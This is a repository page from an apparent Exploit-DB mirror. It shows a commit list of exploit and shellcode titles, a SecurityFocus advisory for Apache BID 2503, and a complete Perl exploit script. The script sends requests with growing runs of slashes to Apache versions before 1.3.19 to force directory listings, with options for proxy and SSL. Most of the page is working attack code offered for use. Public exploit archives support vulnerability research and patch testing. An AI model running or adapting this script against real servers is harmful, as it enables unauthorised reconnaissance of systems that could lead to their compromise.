bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/20692.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

94 lines
No EOL
3.4 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/2503/info
Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.
A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.
This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19.
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################
use libwhisker;
use Getopt::Std;
# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support. Plus, small other changes.
$|++;
my (%hin,%hout,%args);
print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Moved to libwhisker by rfp\n\n";
getopts("p:L:H:sP:R:h:",\%args);
if($args{h} eq ''){
print 'Usage: ./apache3.pl <options>, where options:',"\n";
print '-h host host to scan (must be specified)',"\n";
print '-p ## host port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-P host HTTP proxy via host',"\n";
print '-R ## HTTP proxy port (default: 80)',"\n";
print '-s use SSL (can\'t be used with proxy)',"\n";
exit 0;
}
$low = $args{L} || 1;
$high = $args{H} || 8192;
&lw::http_init_request(\%hin); # setup our request hash
$hin{'whisker'}->{'host'}= $args{h};
$hin{'whisker'}->{'port'}= $args{p} || 80;
if(defined $args{s}){
$hin{'whisker'}->{'ssl'} = 1;
if(defined $args{P}){
print "SSL not currently compatible with proxy\n";
exit 1;
}
}
if(defined $args{'P'}){
$hin{'whisker'}->{'proxy_host'}=$args{P};
$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
print "port $hin{'whisker'}->{'proxy_port'}\n";
}
&lw::http_fixup_request(\%hin); # fix any HTTP requirements
for($c=$low; $c<=$high; $c++){
$hin{'whisker'}->{'uri'} = '/' x $c;
if(&lw::http_do_request(\%hin,\%hout)){
print "Error: $hout{'whisker'}->{'error'}\n";
exit 1;
} else {
if($hout{'whisker'}->{'http_resp'} == 200 &&
$hout{'whisker'}->{'data'}=~/index of/i){
print "Found result using $c slashes.\n";
exit 0;
}
}
print "."; # for status
}
print "\nNot vulnerable (perhaps try a different range).\n";
Reference in a new issue View git blame Copy permalink